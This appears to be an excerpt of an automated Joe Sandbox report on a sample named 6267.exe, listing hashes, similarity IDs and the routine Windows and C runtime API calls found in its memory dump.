                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 6ccc4a6451bcc94a5aac7198432d5b88d6d212664f84590575e23b9ce73248a4
                                                                                                                                                                                      • Instruction ID: ae0112b7feb931e880054559aa296d72d94b918c2bd708fb3ca637017f170d79
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ccc4a6451bcc94a5aac7198432d5b88d6d212664f84590575e23b9ce73248a4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 82118EB1540F84BADA32BFB2CC47FDF779DBF21700F400919B29AA6192DB36B5448652
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,001C5020,00000000), ref: 001E27F2
                                                                                                                                                                                      • __fassign.LIBCMT ref: 001E29D1
                                                                                                                                                                                      • __fassign.LIBCMT ref: 001E29EE
                                                                                                                                                                                      • WriteFile.KERNEL32(?,001C5020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E2A36
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001E2A76
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E2B22
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4031098158-0
                                                                                                                                                                                      • Opcode ID: 75e646a6ce1cbc95d9a5ce4078080f8a006bb33f233b941d3aaadd75994275df
                                                                                                                                                                                      • Instruction ID: 6f04b82254220df4f0a2e1b6357c77edda052af71c3a12573f42f330dd77ca46
                                                                                                                                                                                      • Opcode Fuzzy Hash: 75e646a6ce1cbc95d9a5ce4078080f8a006bb33f233b941d3aaadd75994275df
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AD17E71D006989FCF15CFA9C8909EDBBB9FF49314F28416AE856FB242D730A946CB50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,001D8537,001D8126,001D7775), ref: 001D854E
                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001D855C
                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001D8575
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,001D8537,001D8126,001D7775), ref: 001D85C7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                      • Opcode ID: fcec3bbc8a5b6731455c4fa4384647926dbc747aa96d01e55ce360e20e834d59
                                                                                                                                                                                      • Instruction ID: f99a9eac8e2218b228452acec1ddc3ea42791def6f3e7771412a6d9e0918c0fb
                                                                                                                                                                                      • Opcode Fuzzy Hash: fcec3bbc8a5b6731455c4fa4384647926dbc747aa96d01e55ce360e20e834d59
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4401F73222A3126EEB242BB47CC5A2B37A4EF617F1320032BF520553E1EF715C449984
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\6267.exe, xrefs: 001DFCE4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\6267.exe
                                                                                                                                                                                      • API String ID: 0-3599334778
                                                                                                                                                                                      • Opcode ID: 5ff596ceb0fb199e0a30e6b8382fc7b539f685193689541cc85f71aff1a00d51
                                                                                                                                                                                      • Instruction ID: 0f93f054be5605330615f8c6659a4041842874db830e6cc62dbd78b6493c6b2f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ff596ceb0fb199e0a30e6b8382fc7b539f685193689541cc85f71aff1a00d51
                                                                                                                                                                                      • Instruction Fuzzy Hash: F4210431200515BFDB20AFA2CC8096B77AEAF64364711812AF92797351D730EE4187A0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcsrchr
                                                                                                                                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                      • API String ID: 1752292252-4019086052
                                                                                                                                                                                      • Opcode ID: fb6e35dfaca7781c7f6a79d5de874fc64a2b1296c153d7fec88f4b81889992c8
                                                                                                                                                                                      • Instruction ID: 4e4574d1facc73f5de886865e6d2d80a072ce17c1c431703e89a8f898706d1e0
                                                                                                                                                                                      • Opcode Fuzzy Hash: fb6e35dfaca7781c7f6a79d5de874fc64a2b1296c153d7fec88f4b81889992c8
                                                                                                                                                                                      • Instruction Fuzzy Hash: E701F937608A69656638201ABC63A2B57D99F96BF4767002FFC45FB7C2EF44DC020295
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                      • API String ID: 0-2084034818
                                                                                                                                                                                      • Opcode ID: f43e10fa84b1e4689a8c71fc176532215ed76f08adad82c00a50ccd2167845a5
                                                                                                                                                                                      • Instruction ID: 3ea5664b04d51fe8a5af41ad631f7a266ca31c0f5a0b96ba2cfe4d91716d25a2
                                                                                                                                                                                      • Opcode Fuzzy Hash: f43e10fa84b1e4689a8c71fc176532215ed76f08adad82c00a50ccd2167845a5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3211AB71A01625ABDF315B75DC84A6E77A89F057B0B250253ED06AB790E730ED40C7E4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,001DA688,001DDCAE,?,001DA650,001DABD6,?,001DDCAE), ref: 001DA6A8
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001DA6BB
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,001DA688,001DDCAE,?,001DA650,001DABD6,?,001DDCAE), ref: 001DA6DE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                      • Opcode ID: 78df41a6c17a04a5d6df897a0b5dd5fc8d1b18c745adc8fb30796f1f13854167
                                                                                                                                                                                      • Instruction ID: 603c53d6ca9e0fa778d26d2fcf12f9578a5068294240947c774879fa8d2caee0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 78df41a6c17a04a5d6df897a0b5dd5fc8d1b18c745adc8fb30796f1f13854167
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF0A730600258FBDB119B91DD0DB9D7EB9EF00795F144065F901A55A0CB74CE81DB95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCPInfo.KERNEL32(01592050,01592050,?,7FFFFFFF,?,?,001E5FD5,01592050,01592050,?,01592050,?,?,?,?,01592050), ref: 001E5DBC
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 001E5E72
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 001E5F08
                                                                                                                                                                                      • __freea.LIBCMT ref: 001E5F73
                                                                                                                                                                                      • __freea.LIBCMT ref: 001E5F7F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __alloca_probe_16__freea$Info
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2330168043-0
                                                                                                                                                                                      • Opcode ID: 46b8af053f7f186a4dd4fb17b4c216422f2c8e86dfc809592c6f1ed77f4c828b
                                                                                                                                                                                      • Instruction ID: f6516ba130281d7f02d686f6851c2d470b3c03c158cf973920a179259b060fd0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 46b8af053f7f186a4dd4fb17b4c216422f2c8e86dfc809592c6f1ed77f4c828b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D81B272900E95AFDF209EA6CC51AEEBBBAEF09318F190055E904A7251E721CD40CBA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 001E46C8
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 001E478E
                                                                                                                                                                                      • __freea.LIBCMT ref: 001E47FA
                                                                                                                                                                                        • Part of subcall function 001DD7EA: RtlAllocateHeap.NTDLL(00000000,?,?,?,001D7F22,?,?,?,?,?,001C20C3,?,?), ref: 001DD81C
                                                                                                                                                                                      • __freea.LIBCMT ref: 001E4803
                                                                                                                                                                                      • __freea.LIBCMT ref: 001E4826
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1423051803-0
                                                                                                                                                                                      • Opcode ID: 54f9d4784c88aaa42fcc7dcf725296d7cadd9463a8ff13c85125131c336ad91d
                                                                                                                                                                                      • Instruction ID: f4cc465bb4b8b6d5f9cf138284e510caf18d5070c1f5c948a9a6fd5ecf4ed248
                                                                                                                                                                                      • Opcode Fuzzy Hash: 54f9d4784c88aaa42fcc7dcf725296d7cadd9463a8ff13c85125131c336ad91d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D511872A00696AFEB259FA6DC41EBF37AAEF45750F250129FD04D7240EB70DC5087A0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DAD90), ref: 001DAE80
                                                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(?,?), ref: 001DAEDA
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001DAD90,?,000000FF,00000000,00000000), ref: 001DAF68
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 001DAF6F
                                                                                                                                                                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 001DAFAC
                                                                                                                                                                                        • Part of subcall function 001DB1D6: __dosmaperr.LIBCMT ref: 001DB20B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1206951868-0
                                                                                                                                                                                      • Opcode ID: 275da0ade3cb9f0e39173ca13d52eba129031d3c55c056844af7979359035dca
                                                                                                                                                                                      • Instruction ID: cff61d2b865e2e5a68578951f840e5f82db542a29c452e57c6c7ee19a076505f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 275da0ade3cb9f0e39173ca13d52eba129031d3c55c056844af7979359035dca
                                                                                                                                                                                      • Instruction Fuzzy Hash: AF413AB1900244ABDB24EFB5DC859AFBBF9EF88700B54456EF456D3710EB34A840CB61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 001E1066
                                                                                                                                                                                        • Part of subcall function 001DD301: HeapFree.KERNEL32(00000000,00000000,?,001E10E1,?,00000000,?,?,?,001E1108,?,00000007,?,?,001E150A,?), ref: 001DD317
                                                                                                                                                                                        • Part of subcall function 001DD301: GetLastError.KERNEL32(?,?,001E10E1,?,00000000,?,?,?,001E1108,?,00000007,?,?,001E150A,?,?), ref: 001DD329
                                                                                                                                                                                      • _free.LIBCMT ref: 001E1078
                                                                                                                                                                                      • _free.LIBCMT ref: 001E108A
                                                                                                                                                                                      • _free.LIBCMT ref: 001E109C
                                                                                                                                                                                      • _free.LIBCMT ref: 001E10AE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 710d047591a03b54740593c99f2c09696d1a4524315897ecfdaf3e6f414a3227
                                                                                                                                                                                      • Instruction ID: ab013ea77f650a904f40976ab2654b57e24376b8f82f7a777db653e7c0655793
                                                                                                                                                                                      • Opcode Fuzzy Hash: 710d047591a03b54740593c99f2c09696d1a4524315897ecfdaf3e6f414a3227
                                                                                                                                                                                      • Instruction Fuzzy Hash: 77F01D72514690BB8A20EF6AF9C2D2E73E9BB047607A40906F009D7A05CB31FCC18A65
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID: *?
                                                                                                                                                                                      • API String ID: 269201875-2564092906
                                                                                                                                                                                      • Opcode ID: 6e2e50af061a89f8d40868070dd0582413b0f24a5e8512e61b65add0acbf9032
                                                                                                                                                                                      • Instruction ID: 7d2657782fe4cbb45f238af8df9a296bea5ff00024bad4a7cb4a0687214a558f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e2e50af061a89f8d40868070dd0582413b0f24a5e8512e61b65add0acbf9032
                                                                                                                                                                                      • Instruction Fuzzy Hash: FE613075E00219AFDB14CFA9C8815EDFBF5EF58314B25816EE816E7340D735AE428B90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                      • Opcode ID: 82f96d502d48b8499d753b080f205ec7a0c5419a2b67d97be7e9b291a9e08cfa
                                                                                                                                                                                      • Instruction ID: 6a61125b608a2037849f1e145afaddcf13f649ead1a18a9c66f0756bdda8c71e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 82f96d502d48b8499d753b080f205ec7a0c5419a2b67d97be7e9b291a9e08cfa
                                                                                                                                                                                      • Instruction Fuzzy Hash: B5510272600246AFEB299F15D881BBAB7A4FF20310F24456FE91557791EF31EC80CB90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetVersionExW.KERNEL32(0000011C,?,07E61CD7,00000000), ref: 001C4C19
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001C4C80
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001C4C87
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProcVersion
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3310240892-0
                                                                                                                                                                                      • Opcode ID: 7713154e9a4c9813cd36fe0243fdbe9afcbff53d094b52dcd17e11190a2fcb47
                                                                                                                                                                                      • Instruction ID: 9517b18ecf6f4a4c08a4a0cb34b7e3f669b0f9b478ffde9bb99863484319d213
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7713154e9a4c9813cd36fe0243fdbe9afcbff53d094b52dcd17e11190a2fcb47
                                                                                                                                                                                      • Instruction Fuzzy Hash: 30512770D042489BDB24EBA4CD55BEDBB75EF65310F50429DE809A73D1EB349AC08B91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 001E4D4E
                                                                                                                                                                                      • _free.LIBCMT ref: 001E4D77
                                                                                                                                                                                      • SetEndOfFile.KERNEL32(00000000,001E22AF,00000000,001DD19E,?,?,?,?,?,?,?,001E22AF,001DD19E,00000000), ref: 001E4DA9
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,001E22AF,001DD19E,00000000,?,?,?,?,00000000), ref: 001E4DC5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFileLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1547350101-0
                                                                                                                                                                                      • Opcode ID: d9f5cbffcb9e74891c99b3e8ece5ee578a51322b4197b73ac84cc9fc784c4e0a
                                                                                                                                                                                      • Instruction ID: ab89689432eb58c84c3c4e330120715579c6f4b8e6352b83e3ce1fb99e8f7447
                                                                                                                                                                                      • Opcode Fuzzy Hash: d9f5cbffcb9e74891c99b3e8ece5ee578a51322b4197b73ac84cc9fc784c4e0a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 36410772900E819BDB15AFFACC42B9E37A9BF74360F250511F925E7292EB34D8408761
